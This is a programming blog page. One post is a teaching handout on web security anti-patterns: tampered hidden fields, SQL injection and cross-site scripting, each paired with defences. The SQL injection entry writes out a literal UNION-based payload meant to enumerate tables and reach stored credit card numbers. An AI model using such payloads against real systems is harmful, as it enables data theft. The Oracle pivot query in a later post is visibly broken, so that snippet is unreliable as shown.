Youth culture killed my dog 8 to 12 of 22 articles Change bannerposts rsscomments rss

Common Web Security Anti-Patterns   16 Jan 05
[print link all ]

The following is from a handout I used for a presentation to a group of Java programmers. In retrospect I don't think I like the anti-pattern format, but hopefully you will find it helpful in spite of that.

Name: Trusting form data
Problem: Preserving state across a series of web pages and form submissions.
Supposed Solution: Store information in hidden form fields.
Exploit: The values of the hidden fields can be easily changed by an attacker to subvert the application. The application will then use the altered data in calculations that should only performed with trusted data.
Example: The data stored in the hidden field is the price of an item in an ecommerce system. A criminal organization exploits this to purchase a large number of expensive items at a 100% "discount".
Alternative Solutions:
  • Only accept data from forms when it doesn't matter if it is tampered with. For example instead of storing the price in an ecommerce system, only store the product id then look up the price using the product id as a key.
  • Use a framework such as Lakeshore that abstracts away the problem of managing state across pages.
  • In cases where sensitive data must stored on the client side (e.g. a price quote) the sensitive data must be cryptographically signed. A signature can be generated by concatenating the sensitive data with a secret and calculating a one way hash. This signature is then always passed with the sensitive data allowing any tampering to be detected.
Name: SQL Injection
Problem: User supplied data must be used in queries against a database.
Supposed Solution: Just substitute the user input into an SQL template and execute it.
Exploit: An attacker can carefully craft the supplied data to execute arbitrary SQL. The details vary by database vendor, but for Oracle the key concept is starting the SQL to be inserted with a single quote.
Example: An ecommerce system allows the catalog of products to be to searched based on a user supplied string by simply inserting the user supplied string into a query. The attacker enters the following as a search criteria: x' UNION SELECT table_name FROM user_tables WHERE 'x'='x. This will allow the attacker to obtain the name of the table that credit card information is stored in then use the same technique to retrieve all of the credit card numbers stored in the system.
Alternative Solutions:
  • Don't execute SQL using raw JDBC calls. Use a library such as SQLProcessor that always uses prepared statements. This is sufficient for applications that use Oracle databases, but may not be for other databases.
  • Escape single quotes in user input before using it in an SQL statement.
Further reading: http://www.securityfocus.com/infocus/1644

Name: Cross Site Scripting (xss)
Problem: User supplied data is displayed to other users
Exploit: An attacker can carefully craft the data so that it does a wide variety of malicious things when another user views the data.
Example: An ecommerce system displays the names and addresses of problem orders on a screen accessible by an administrative user. The attacker enters javascript for his address that will steal the viewing user's JSESSIONID cookie and post it to a logging URL controlled by the attacker. When the administrator views the attacker's order his JSESSIONID is stolen and the attacker can then impersonate the administrator.
Alternative Solutions:
  • Filter out dangerous characters from user supplied input before storing it.
  • Encode all user supplied input before displaying it to other users
Further reading:
|

Stupid SQL tricks   13 Jan 05
[print link all ]

Consider the following tables:

people

id name
1 Jack
2 Jane
3 Raja
4 Aaliyah

questions

id text
1 What’s your favorite color?
2 Do you like dogs?

answers

person_id question_id value
1 1 Red
1 2 Yes
2 1 Blue
2 2 No
.. .. ..

This SQL:


SELECT people.id, MAX AS name,
MAX) AS favorite_color,
MAX) AS likes_dogs
FROM people, answers
WHERE people.id = answers.person_id
GROUP BY people.id

Will yield the following:
|. people.id|. name|. favoritecolor|. likesdogs|
|1|Jack|Red|Yes|
|2|Jane|Blue|No|
|3|Raja|Green|No|
|…|…|…|…|

A coworker of mine, Ken Gibbs, showed me this technique several years ago and I’ve used it frequently since. While this use of MAX and DECODE is hardly unknown , I have recently shown this to a few people who were really excited by it. So I thought I would share it with you, dear reader. Also, note that Oracle’s DECODE can easily be replaced with a CASE in other SQL dialects.

Update: fixed an error in the example SQL


|

Javascript, it's what's for dinner   25 Oct 04
[print link all ]

Javascript is a good language. I like Ruby better, but it is certainly better than Java (which is not a good language) and it has has certain unique charms. A dynamic, prototyped OO language with a runtime penetration of nearly 100% on desktop systems. I’m ashamed I haven’t done more with it.
This script from Florian Gross that adds several of the Ruby standard methods to Javascript is an excellent example how flexible and clean Javascript is. Below is a code snippit for adding Ruby style mixin support to Javascript. While it is impressive that Javascript is flexible enough to allow this sort of thing, the truly amazing bit is that it is seven lines of straightforward code that even a casual Javascripter such as myself can understand.

Object.prototype.extend = function(other) {
 if (!this.mixins) this.mixins = []
 this.mixins.push(other)
 for (var property in other)
   if (!this.hasOwnProperty(property))
     this[property] = other[property]
}

Now for the practical aspects of programming Javascript Ruby style.
Here’s some brief documentation written by Florian. Also while using ruby.js in a script that interacts with the DOM, I ran into a bit of trouble. In Firefox at least the Array that is returned by getElementsByTagName does not have the added methods. I would appreciate any explanation as to why this is so, but there is a work around in the mean time.
Instead of:


foo.getElementsByTagName(‘tr’).each(function(row) {
…do something with the row…
});

You have to:

Array.fromObject(foo.getElementsByTagName(‘tr’)).each(function(row) {
…do something with the row…
});


|

ImageMagick rules the Gimp   05 Sep 04
[print link all ]

I’ve always been jealous of graphic artists. They juggle dozens of layers and composite images with ease with their fancy photoshops and gimps. I’ve tried several times to do some simple tasks with the Gimp and was defeated in each case. So I’ve found myself going hat in hand to the “graphics guy” (no slight intended to the ladies; I’ve just never worked with a female graphic artist) for even the simplest of buttons and on personal projects I’ve just had to do without.

I’ve used ImageMagick occasionally over the years for converting between formats and checking image sizes. I recently stumbled on this great set of examples by Anthony Thyssen of using ImageMagick for complex multi-step manipulations. When you add in a terrific set of Ruby bindings, the result is graphical independence for people such as myself.

While I’ve still got a long way to go before I master these new techniques, I have used them to generate a banner for this page and a few buttons for a work project. Here’s the source of my banner generating script and you can try it out by clicking the Change banner link at the top of the page. Expect the banner to become ever more decedent as I add tricks to my tool box.


|

Greatest API design evar   02 Sep 04
[print link all ]

<pre> <steveny> Never do this: <steveny> Calendar calendar = Calendar.getInstance(Locale.US); <steveny> calendar.set(Calendar.MONTH, month); <steveny> calendar.set(Calendar.YEAR, year); <steveny> if it is the 31st now (the calendar.getInstance() returns the current time) <steveny> setting the month to a month with < 31 days <steveny> will cause the calendar be set to the 1st of the next month <darrend> niiiice <steveny> yep <richier> greatest API design evAR <steveny> so never do that ;) </pre>


|

 

Copyright © 2024 Leslie A. Hensley